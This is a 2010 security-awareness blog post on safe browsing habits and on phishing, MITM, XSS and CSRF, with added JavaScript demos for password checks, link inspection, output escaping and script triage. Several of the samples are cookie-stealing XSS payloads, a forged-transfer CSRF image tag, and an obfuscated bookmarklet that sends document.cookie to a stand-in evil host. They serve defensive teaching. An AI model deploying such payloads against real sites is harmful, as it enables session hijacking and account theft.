Wednesday, June 30, 2010

The web of deception

Just before we start with the post, I would like to share some statistics (estimates)



• Number of known computer viruses - More than 1,122,000 (update from BBC news)

• Number of spam emails sent - More than 100 billion per day

• Number of websites defaced in a year - 480,905 (reported to zone-h in 2007)



Major services with known security bugs in 2007



• Hotmail/Windows Live Mail

• Yahoo Mail

• Facebook

• Gmail

• Orkut

• Rediff



If you've noticed, I've named almost all the major web sites you use in your day to day life. The stats and facts make it obvious that most of these services are not very secure, and each of them had at least one security bug last year. But that is not the topic of this post. At the end of the day, they are just websites providing some service; in one word, they are nothing but "software". There is a famous quote among security enthusiasts: software can be patched, but there are "no patches for human stupidity".



This post is about us, humans: the major 'silly' mistakes we make and the minor 'cares' we don't take while surfing the internet, which can turn us from 'computer users' into security incident 'victims'. It is a list of "ToDos" and "!ToDos" while surfing the internet. I might miss some important points or misinterpret some, so since this is a blog, please feel free to update/correct me when you find errors or important points I may have missed.



Here we go. By the way, some of them are very silly. You might think that you very rarely do some of the items on this list. Yeah, you are right, but "rarely" != 0%, and you 'might' get hacked even if you do it 'just' once.



1. "Remember me" option while using public computers



Well, believe me, this is one mistake most of us make. We use public computers at



• Libraries

• Cybercafes/Browsing Centres

• Computers at others' homes


and log in to our email, check it, and when we are leaving in a hurry we forget to log out and just close the browser. Closing the browser might end your session on our Ultimatix, but it won't log you out of Yahoo Mail/Gmail when you've ticked the "Remember me" option, because that option sets a persistent cookie that survives closing the browser. All of you who have used public computers must have seen others log in and leave without logging out at least once. It may not happen a lot with webmail, but it certainly happens a lot with instant messengers, as they remember the password even after you log out and exit.



2. Not clearing the history/cookies/remembered passwords before leaving a public computer



This mistake is similar to the one above. All the major browsers offer to remember your username/password when you log in to a website. And, yeah, most of us have the habit of pressing 'Yes' or 'No' to whatever the browser asks without reading it. If you are not in a hurry, you might read the prompt and press No. But when you are in a hurry, you 'might' press Yes, and then the browser will store the password. If you don't clear it, a 'bad guy' can extract it without any difficulty: the browser's own password manager will show the saved passwords in clear text to whoever sits down next.



3. Using outdated browser software



Using an outdated browser or outdated browser plugins can get you in trouble more easily than anything else. It can get you 'free' malware, spyware and viruses on your machine, and it can get you hacked. When I say outdated browser, it can be the so called "most used browser" Internet Explorer, the so called "most secure browser" Firefox, or even the so called "world's best browser" Safari.



Trivia: In the Pwn2Own contest at CanSecWest 2008, a MacBook Air was owned within 2 minutes using a bug in its default web browser, Safari 3.1. Windows Vista was owned using a bug in the Adobe Flash Player plugin. The only laptop that remained un-hacked was the one running Ubuntu Linux 7.10. If you see, the so called world's best OS was hacked because of its browser and, ahem, Vista was hacked because of a bug in a plugin used by its default browser.



4. Clicking links in emails and opening any/all attachments



You would be getting a lot of emails every day, and a lot of them might have attachments. By clicking on links from unknown people, you might be making a mistake like confirming to a spammer that your email address is active. Let me explain this in simple words: if the link you click is http://spammer.domain.com?email=karteek.e@tcs.com, you are doing nothing but visiting his web application and confirming that the address is active and in use. Links won't always be so obvious in your mails (the address may be hidden inside an opaque token), so avoid clicking links in emails from unknown senders. And don't try to opt out of mailing lists you never signed up for; that "unsubscribe" link is the same trick used by spammers. This is a standard way to confirm email addresses for spamming purposes and also a potential phishing threat.



And about opening any/all attachments. If you remember the Love Bug (the ILOVEYOU worm of 2000), it was a VBScript that arrived only from "known" and "trusted" people and mailed itself to everyone in your address book. It caused damage estimated at about 5.5 billion dollars. The Pentagon, CIA, British Parliament and large corporations had to shut down their email systems to get rid of the worm. I guess you don't need more explanation of why NOT to open any/all attachments without thinking. Of course, you can open your attachments after a virus scan. When opening Office documents, it's always better to keep macros from untrusted sources disabled.



5. Not using ANTI VIRUS !!! or anti-spyware or a firewall



Well, I know. This is the silliest tip one can give to the best of breed software engineers. It is a tip based on my experience. I've seen that most of my friends have anti-virus installed on their machines BUT it is either disabled, because it asks too many nagging questions, or simply outdated, because they are too lazy to update the virus definitions. Seriously, what is the use of anti-virus software that is installed on the computer but disabled, or running with virus definitions that are a year old?



And no, anti-virus need not be able to remove all spyware. Spyware can be more dangerous than viruses when it comes to your security. Spyware can send your information to the web periodically, and that information can vary from the applications you use to all the websites you visited, your login credentials at those websites, and even EVERY KEY you've pressed while using the infected computer. So install a good anti-spyware application too.



And do remember, cybercafes can be dangerous not just because of viruses but because of keyloggers. The admins of a cybercafe can install keyloggers (software, or a small hardware dongle between the keyboard and the PC) on those machines and spy on their customers. So access the internet only at trusted cybercafes and avoid banking there ;).



And the inbuilt firewall of your OS may not be sufficient. The firewall that comes with your OS might be one-way (guarding you only from incoming connections) and not two-way (also controlling outgoing connections, which is what stops spyware from sending your valuable information to the web). Best of breed anti-virus, anti-spyware and firewalls are available for free to home users. And there is an even better option to avoid most of these viruses, and it is called Linux.



6. Not applying security patches



Just as an outdated anti-virus cannot detect all the new viruses, software with unpatched security holes cannot be secure. So keep track of all the software you use and its security issues. The easiest solution is to ensure that you are running the latest stable versions of all the software you use, and to pay special attention to software that is in beta, as it is more prone to security vulnerabilities.



7. Using simple passwords



Almost all the services you use online require a username and password. Believe it: most servers are hacked not because they are insecure, but because they use default or easy-to-guess passwords. I'm sure that at least some of us are still using the default password for the webmail, and if not the default, it might be a date of birth, a mother's name, a girlfriend's name, or even the dog's name, or at least a dictionary word in English or French or some other language. Using an easily guessable password is as big a mistake as using a dictionary word or a default password. So one has to understand that a password should be long and complex, and should contain letters, digits and symbols.



Trivia: The most commonly used password is "password" (yeah, the word password). By the way, when choosing a complex password, don't choose something so complex that even you can't remember it. Well, I will tell you one of my passwords which I used around 5 years ago. It is complex, hard to brute-force and yet simple to remember: th!S!SmYp4ssw0rD. This password is long (16 characters) and it contains letters and digits as well as symbols. And remember, this was simple: all words end in a capital letter, all 'i's are made into '!', 'a's into '4' and 'o's into '0'. Don't try to log in to my webmail/Ultimatix using this password, it is different now. One caveat: this scheme resists a blind brute force, but password crackers ship with "mangling rules" that undo exactly these substitutions, so a dictionary phrase written in leet speak is weaker than its length suggests. By the way, Tata@1234 is NOT an example of a good password even though it contains letters, digits and special characters. It is an obvious guess within the company.
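As an added example (not code from the original post), here is a small Node.js check that looks at a password the way a cracker would: it undoes the leet substitutions described above, strips the trailing digits and symbols people like to append, and asks whether what is left is just dictionary words. The word list, the function names and the three sample passwords are constructed for this example; a real check would use a full cracking dictionary.

```javascript
// Added example, not code from the original post.
// Shows why a leet-speak phrase or "company name + digits" fails a check that
// thinks like a password cracker. The word list and passwords are constructed.

const MIN_LENGTH = 12;
// Substitutions that cracker "mangling rules" routinely undo
const LEET_MAP = { '!': 'i', '1': 'i', '|': 'i', '4': 'a', '@': 'a', '0': 'o', '3': 'e', '$': 's', '5': 's', '7': 't' };
// A real check would use a large cracking dictionary; this is a toy list
const WORDLIST = new Set(['this', 'is', 'my', 'password', 'tata', 'welcome', 'admin', 'love', 'secret']);

// Lowercase and undo leet substitutions: "th!S!SmYp4ssw0rD" -> "thisismypassword"
function normalizeLeet(pw) {
  return pw.toLowerCase().split('').map(c => LEET_MAP[c] || c).join('');
}

// Can the whole string be split into dictionary words? Returns the words or null.
function splitIntoWords(s) {
  const memo = new Map();
  function from(i) {
    if (i === s.length) return [];
    if (memo.has(i)) return memo.get(i);
    let found = null;
    for (let j = s.length; j > i; j--) {          // longest candidate word first
      const w = s.slice(i, j);
      if (WORDLIST.has(w)) {
        const rest = from(j);
        if (rest !== null) { found = [w, ...rest]; break; }
      }
    }
    memo.set(i, found);
    return found;
  }
  return from(0);
}

// Returns { strong, findings }: strong only if no finding was raised
function assessPassword(pw) {
  const findings = [];
  if (pw.length < MIN_LENGTH) findings.push(`only ${pw.length} characters, want at least ${MIN_LENGTH}`);
  const classes = [/[a-z]/, /[A-Z]/, /[0-9]/, /[^A-Za-z0-9]/].filter(re => re.test(pw)).length;
  if (classes < 3) findings.push('fewer than three character classes');
  // Strip the trailing digits/symbols people append ("Tata@1234" -> "Tata"), then undo leet
  const core = normalizeLeet(pw.replace(/[^A-Za-z]+$/, ''));
  const words = splitIntoWords(core);
  if (words && words.length) findings.push(`it is just dictionary words in disguise: "${words.join(' ')}"`);
  return { strong: findings.length === 0, findings };
}

for (const pw of ['th!S!SmYp4ssw0rD', 'Tata@1234', '9rV#kL2m!qWx7Zp']) {
  const r = assessPassword(pw);
  console.log(pw, r.strong ? 'OK' : r.findings);
}
```

The first password passes the naive "length plus character classes" rule and still fails, because after normalization it is four common words; the second fails on length and because its core is the company name; only the random one passes. That is the gap between looking complex and being hard to crack.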



8. Giving passwords to third party sites



Giving your primary email's username and password to third-party websites just to invite your friends there, or to let you chat with them. Yeah, the third-party site claims that it won't remember the username and password and will only use them once to fetch your address book and invite your friends. Well, no matter what they claim, don't trust such applications: with your password they can read every mail you have, reset your passwords on other sites, and lock you out. If it is a good service, there will be an option to upload your address book or a list of email addresses manually (LinkedIn, for example), and it is always better to upload your address book than to give them your password.



Well, these are the silly things one 'might' do while using the internet. By doing them, you are 'letting' someone hack you. But what happens when someone actively wants to hack you? Ever heard of 'identity theft'? What happens with XSS? What about XSRF? How does an MITM attack happen? Here is a (non-exhaustive) list of hacker methods that I think you ought to know about and understand.



1. Identity Theft



A bad guy can use your name to



• buy goods and services

• live under your name

• take out a credit card in your name and use it, etc.



Well, all of this sounds really scary, and when you are not careful online you can actually become a victim of identity theft. Let me tell you an example. A girl 'A' used Orkut, which is quite famous among youngsters (and now us cyber folks too). One day a bad guy 'B' hacked her account and changed her password. The girl had no clue what had happened with her password, but later she came to know that her male friends were getting indecent scraps from her ID, and all the communities she owned had been deleted. Then the nightmare started, when she saw that her Picasa web albums had been made public and links to them posted in other communities. All her female friends blamed her for keeping their photos in her web album. Her whole online image was spoiled by 'B' just by hacking her password. By the way, this is a real-life incident, and the nightmare had a happy ending when she lodged a complaint at the cyber crime cell and they got the account blocked forever.



All the time she had one doubt: who hacked her account, and how? Even I don't know how it was hacked, but I can assure you that by the end of this post you will know how to avoid this awkward situation of losing your identity.



2. Phishing



According to Wikipedia, phishing is "An attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication". That is a simple enough definition, but I will explain it with an even simpler example.



A good friend of mine, 'S', is a Facebook user. Once he was chatting on IRC (Internet Relay Chat) and one of the guys in the room gave him a URL, telling him it had links to loads of Facebook apps. My friend clicked on it, it redirected him to a Facebook login page, he logged in and saw some links there. After a while, the guy who gave him the URL messaged him his exact password. My friend was shocked; later he came to know that he had just entered his details on a fake login page. It was lucky that the attacker wasn't a bad guy but just wanted to play a prank on him.



Don't try the URL. I told you already, it's fake. If you had looked at the address, it was not the genuine site's URL. And don't sign in to a bare IP address with the username and password of some website; most probably it is fake. There is one more thing you need to take care about: server identity. Almost all major websites use signed certificates to prove their identity. If you get an error from the browser that the certificate is invalid, DO NOT do what you do regularly and hit Yes; check the identity twice and, if needed, open the website manually by typing its address rather than clicking the given URL. Sadly, we are so used to hitting Yes because of Ultimatix's invalid certificate.
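As an added example (not code from the original post), here is a small Node.js script that applies the checks from the link-clicking tip and from this phishing section to the links in an email body before anyone clicks them: does the href carry an email address in its query string (the tracking trick), does it point at a bare IP address or use plain HTTP, and does the visible link text name one domain while the href goes to another? The HTML snippet, the function names and the hosts are constructed for this example (spammer.domain.com comes from the post; 203.0.113.7 is a documentation-only address).

```javascript
// Added example, not code from the original post.
// Heuristic checks on links found in an e-mail body. The sample e-mail below is constructed.

const ANCHOR_RE = /<a\s+[^>]*href\s*=\s*"([^"]*)"[^>]*>([\s\S]*?)<\/a>/gi;
const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
const IPV4_RE = /^\d{1,3}(?:\.\d{1,3}){3}$/;
const DOMAIN_IN_TEXT_RE = /(?:https?:\/\/)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})/i;

// Pull (href, visible text) pairs out of an HTML e-mail body.
// A regex is enough for this demo; a real tool would use an HTML parser.
function extractLinks(html) {
  const links = [];
  let m;
  ANCHOR_RE.lastIndex = 0;
  while ((m = ANCHOR_RE.exec(html)) !== null) {
    links.push({ href: m[1], text: m[2].replace(/<[^>]+>/g, '').trim() });
  }
  return links;
}

// Crude "registrable domain": the last two labels. Good enough to tell
// mail.google.com from google.com.evil.example in this demo.
function registrableDomain(hostname) {
  return hostname.toLowerCase().split('.').slice(-2).join('.');
}

// Human-readable warnings for one link; an empty array means nothing looked off.
function inspectLink(href, text) {
  const warnings = [];
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return [`unparseable href: ${href}`];
  }
  if (url.protocol !== 'https:') warnings.push('not HTTPS');
  if (IPV4_RE.test(url.hostname)) warnings.push('host is a bare IP address');
  for (const [key, value] of url.searchParams) {
    if (EMAIL_RE.test(value)) {
      warnings.push(`query parameter "${key}" carries an e-mail address; opening it confirms the address is live`);
    }
  }
  const shown = DOMAIN_IN_TEXT_RE.exec(text);
  if (shown && registrableDomain(shown[1]) !== registrableDomain(url.hostname)) {
    warnings.push(`link text shows ${shown[1]} but the href goes to ${url.hostname}`);
  }
  return warnings;
}

function inspectEmail(html) {
  return extractLinks(html).map(({ href, text }) => ({ href, text, warnings: inspectLink(href, text) }));
}

// Constructed sample message, not a real e-mail
const SAMPLE_EMAIL = `
<p>Dear user,</p>
<p><a href="http://spammer.domain.com?email=someone@example.com">Click here to unsubscribe</a></p>
<p><a href="http://203.0.113.7/login">https://www.facebook.com/login</a></p>
<p><a href="https://mail.google.com/">Gmail</a></p>
`;

for (const link of inspectEmail(SAMPLE_EMAIL)) {
  console.log(link.href, link.warnings.length ? link.warnings : ['looks normal']);
}
```

The second link is the phishing pattern from the story: the text reads like a Facebook address, the href is a bare IP over plain HTTP. These heuristics catch the obvious cases; a lookalike domain registered by the attacker (for example one that differs by a single letter) would still pass the domain comparison, which is why typing the address yourself remains the safer habit.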



3. MITM



Man In The Middle attack. Everything is in the name itself: there is an attack, and there is a 'bad' man in the middle performing it. The attacker intercepts the communication between the victim and the server and acts as a proxy, which enables him to read, insert and modify the data in the intercepted communication.



The attacker can not only read usernames and passwords but can also completely change the information the server sends to the victim. Taking net banking as an example, the attacker can capture the victim's username and password, empty his account, and still show a full balance whenever the victim logs in. He can make sure the victim never suspects anything until he finds out from some other channel.



Here too, the day can be saved by certificates. A server certificate binds the server's identity to its public key, and only the real server holds the matching private key. So the attacker is left with no alternative but to present a fake certificate to the victim, which the browser on the victim's computer will warn about. If the victim is in a hurry and presses Yes, as he presses Yes for Ultimatix, he will be in big trouble: the day saved by the certificate is spoiled again by the victim's carelessness. With unencrypted traffic, the user can never find out whether it is being intercepted or not. So it is always safer to avoid logging in to websites without SSL when you are behind a proxy or on a network you don't control. By the way, a proxy is nothing but an example of having a man in the middle, but a good proxy won't tamper with the data, and hence it is not an attack.



Here there is a small advantage for the victim: the attacker has to change the proxy settings in the victim's browser in order to hack him. But there is a more evil version of the MITM attack, called ARP spoofing or ARP poisoning. Here the attacker works at the level of MAC and IP addresses on the local network, so no browser setting changes at all; any machine on the same LAN (the same cybercafe or wireless network, say) can redirect your traffic through itself. Managed switches from vendors like Cisco have features to detect and stop it, but the cheap unmanaged networks most of us sit on do not.



4. XSS



Cross Site Scripting is the hottest tool for hackers in this generation of Web 2.0 and Ajax-rich applications. Here the victim is really innocent and the programmer of the web application is the real culprit. There is a rule followed by all browsers, the Same Origin Policy, which ensures that script running in a page from one origin CANNOT get or set properties of a document from a different origin. With XSS, the hacker gets his script to run as part of the vulnerable site itself, so the Same Origin Policy no longer protects the user, and the hacker can do anything the site's own script could, including very convincing phishing.



Let me explain this in simple terms. Let http://gooddomain.com/script.js and http://evildomain.com/evil.js be two scripts. A page on gooddomain.com that includes script.js lets it access all the properties of documents originating from gooddomain.com, but a page on evildomain.com that includes evil.js cannot touch them because of the Same Origin Policy. But what if evil.js gets loaded by a page on gooddomain.com?



I'm sure you want to know how evil.js can be loaded from gooddomain.com. Well, consider Orkut as an example. There, users can scrap each other. Scrapping is nothing but sending some text, which is shown to the user when he signs in again. If the text is "Hello buddy", that's fine. But what if the text is a <script> tag whose src points to http://evildomain.com/evil.js? The victim's browser will simply fetch the script and run it. A good programmer would sanitize the text, turning > and < into &gt; and &lt;, which stops the browser from treating it as a script reference. When the programmer doesn't, the application is said to have an XSS vulnerability, which means evil.js is up and running inside gooddomain.com. Because the script runs as part of a gooddomain.com page, the Same Origin Policy is no help here: whether the hacker injects a reference to evil.js or pastes its contents inline, the script can access everything that page can, including the cookies (which hold your session), and can certainly do something "phishy". Uhmm, yeah, you heard it correctly. Cookies/sessions: they are what prove to the site that you are logged in, so by stealing your cookies the hacker steals your logged-in access.



Now the doubt is, "how can he steal my cookies?" Whenever input is given to the web application, the application should sanitize it (remove or encode all the dangerous vectors) before echoing it back to the browser. But sometimes the programmer misses the sanitizing and ends up making the application vulnerable to XSS, creating all these troubles for the users. If you see the above screenshot, it is an example where the contents of evil.js are inserted and the hacker can read the cookie.
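As an added example (not code from the original post), here is the scrapbook rendering from the paragraphs above written twice in Node.js: once the way a careless programmer writes it, and once with output encoding. A small tag counter shows what the injected scrap does to each rendering. The function names, the escape table and the sample scraps are constructed for this example; evildomain.com/evil.js comes from the post.

```javascript
// Added example, not code from the original post.
// The scrapbook rendering from the text, once without output encoding
// (vulnerable) and once with it. Function names and sample scraps are constructed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode for the HTML text context. '&' must be encoded too, otherwise an
// attacker can smuggle entities through the filter.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, c => HTML_ESCAPES[c]);
}

// Vulnerable: untrusted scrap text is concatenated straight into the page,
// so "<script src=...>" in a scrap becomes a real script tag.
function renderScrapVulnerable(from, text) {
  return `<div class="scrap"><b>${from}</b>: ${text}</div>`;
}

// Hardened: every untrusted value is encoded for the context it lands in.
function renderScrapSafe(from, text) {
  return `<div class="scrap"><b>${escapeHtml(from)}</b>: ${escapeHtml(text)}</div>`;
}

// Test helper: how many HTML tags does the rendered fragment contain?
// The template itself has exactly four (div, b, /b, /div); anything more came from input.
const TAG_RE = /<\/?[a-z][^>]*>/gi;
const TEMPLATE_TAGS = 4;
function countTags(html) {
  return (html.match(TAG_RE) || []).length;
}

// Constructed payloads: the external-script form from the text, and an inline
// one that ships the cookie to the attacker inside an image request
const SCRAPS = [
  'Hello buddy',
  '<script src="http://evildomain.com/evil.js"></script>',
  '<img src=x onerror="new Image().src=\'http://evildomain.com/c?\'+document.cookie">',
];

for (const scrap of SCRAPS) {
  const injectedVuln = countTags(renderScrapVulnerable('friend', scrap)) - TEMPLATE_TAGS;
  const injectedSafe = countTags(renderScrapSafe('friend', scrap)) - TEMPLATE_TAGS;
  console.log(JSON.stringify(scrap));
  console.log(`  vulnerable rendering adds ${injectedVuln} tag(s); safe rendering adds ${injectedSafe}`);
}
```

Note that escapeHtml is only correct for text placed between tags (and inside quoted attribute values). A value dropped into a JavaScript block, a URL, or a CSS rule needs an encoder for that context; using the wrong one is how "sanitized" applications still end up with XSS.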



Trivia: If you remember the great chaos of Orkut communities getting stolen in 2006, it was because of an XSS vulnerability in Orkut. The hackers used to steal the sessions of community owners and make themselves owners of the communities. XSS is quite common and dangerous. There have been XSSes in Google, Microsoft, Yahoo, Rediff and even TCS.com. Well, of course, they are all fixed now.



Well, you can avoid a lot of XSS by using Firefox with the NoScript add-on, which blocks scripts from sites you haven't whitelisted (it cannot help against a script injected into a site you do trust, which is why the real fix has to come from the site). This combination is considered the best when it comes to browser security. Let me know if any of you IE fanboys know a way to make IE more secure than this combination.



5. XSRF



XSRF, or CSRF, is Cross Site Request Forgery, a near cousin of XSS. This is also the outcome of a mistake by the web programmer. It is not a very famous method of exploiting websites, but it is certainly good enough to reach the top when a vulnerable web application is found; it is a sleeping giant among web application vulnerabilities. Here the hacker transmits unauthorized commands from the user's browser to the vulnerable website, and the site accepts them because the browser attaches the user's cookies to every request to that site, no matter which page the request came from.



An example will make it easy to understand. Consider a website the victim is logged on to, and assume it is a gambling website. If the gambling website has an option to transfer credits from one user to another on request, and the request is a plain URL, the hacker puts on his own page an image tag whose src is that URL, something like

<img src="http://gambling-site/transfer?to=hacker&amount=10000">

When the victim opens that page, the victim's browser will try to fetch the image's src (thinking it really is an image) and thus request the gambling site to transfer 10000 points from the victim's account to the hacker. The gambling site accepts the request because the browser sent the victim's session cookie along with it. Most XSRF can be avoided when the application designer puts a secret, per-session token in every state-changing form and checks it on the server; the hacker's page cannot read that token, so it cannot forge the request. A CAPTCHA on the action also works, but annoys users. Using POST rather than GET for anything that changes state is necessary too, but not sufficient on its own, because a hidden auto-submitting form can forge a POST just as easily. And it is always better not to open untrusted sites while doing important transactions on the web.



6. Copy-pasting JavaScript into the URL bar and hitting Return, and untrusted Greasemonkey scripts



These days, I see many of my friends on Orkut sending scraps to everyone using some JavaScript. Well, it can be a good JavaScript, and at the same time it can be a malicious one. You might have seen communities telling you to copy-paste this JavaScript into the URL bar and press Enter to increase your cool/hot stats, or to reveal who has a crush on you. They are all malicious. JavaScript is a simple client-side browser language, but it has one big thing in its hands on the browser: a script pasted into the address bar of a page runs as that page, so it can access your session/cookie information and send it to the hacker. So when you see a script your friend asked you to copy into the URL bar and hit Enter, it's better to read it first, and if you can't understand what it does, it's better not to execute it.

The same goes for Greasemonkey scripts. Some of the advanced users here would be using the Firefox and Greasemonkey combination. Greasemonkey is a great add-on that adds some great features to the browser. But at the end of the day one has to remember that Greasemonkey scripts are nothing but JavaScript, executed by the browser on the given website. As it is JavaScript, it can absolutely access your session variables and send them to the hacker. By the way, folks who used the good old Webmail Greasemonkey script: if you've read the code, I'm saving all your passwords! Just kidding, don't worry, I'm not an evil hacker, just a security enthusiast.
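As an added example (not code from the original post), here is a small Node.js triage helper for the "paste this into your address bar" scripts described above. It undoes the common String.fromCharCode obfuscation so that the hidden text can actually be read, then reports what the script reaches for: cookies, outbound requests, dynamic code, and any hosts it contacts. Both sample scripts are constructed for this example; evildomain.com comes from the post.

```javascript
// Added example, not code from the original post.
// A triage helper for "paste this into your address bar" scripts: decodes
// String.fromCharCode(...) obfuscation and reports what the script reaches for.
// Both sample scripts below are constructed.

// Patterns worth a second look, and what they mean for the person pasting the script
const SIGNS = [
  [/document\.cookie/, 'reads your session cookies'],
  [/new\s+Image\s*\(|\.src\s*=|XMLHttpRequest|\bfetch\s*\(|\blocation\s*=/, 'sends data to, or loads from, another server'],
  [/\b(?:eval|unescape|atob)\s*\(|String\.fromCharCode/, 'hides what it does behind obfuscation or dynamic code'],
];

// Replace String.fromCharCode(100,111,...) with the string literal it builds,
// so the hidden text can be read and matched
function decodeCharCodes(script) {
  return script.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (_, list) =>
    JSON.stringify(String.fromCharCode(...list.split(',').map(n => parseInt(n, 10)))));
}

// Distinct findings for a pasted script; an empty array means nothing obvious was found.
// No findings is not proof of safety: this is a first read, not a sandbox.
function triage(script) {
  const haystack = script + '\n' + decodeCharCodes(script);
  const findings = new Set();
  for (const [re, why] of SIGNS) if (re.test(haystack)) findings.add(why);
  for (const m of haystack.matchAll(/https?:\/\/([^/'"\s]+)/gi)) findings.add(`contacts ${m[1]}`);
  return [...findings];
}

// Constructed "who has a crush on you" scrap script: the cookie read is hidden in char codes
const CRUSH_SCRIPT =
  "javascript:(function(){var i=new Image();" +
  "i.src='http://evildomain.com/c.php?c='+escape(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)));})()";

// Constructed harmless one: it only restyles the page
const HARMLESS_SCRIPT = "javascript:document.body.style.backgroundColor='pink';void 0";

for (const s of [CRUSH_SCRIPT, HARMLESS_SCRIPT]) {
  const findings = triage(s);
  console.log(s.slice(0, 60) + '...');
  console.log('  ', findings.length ? findings : 'nothing obviously suspicious');
}
```

Reading the raw crush script you would see an image request to evildomain.com but not the words document.cookie; decoding the char codes is what exposes them. That is the practical lesson behind "read it before you run it": obfuscation in a script meant for you to paste is itself a red flag.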



Hope these tips help make your online presence safer. A closing quote for a long blog post: "The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and I'm not even too sure about that one" (Dennis Hughes).



This is a never-ending search, so keep posting any new details in the comments and do provide feedback at duvvurusandeep@gmail.com
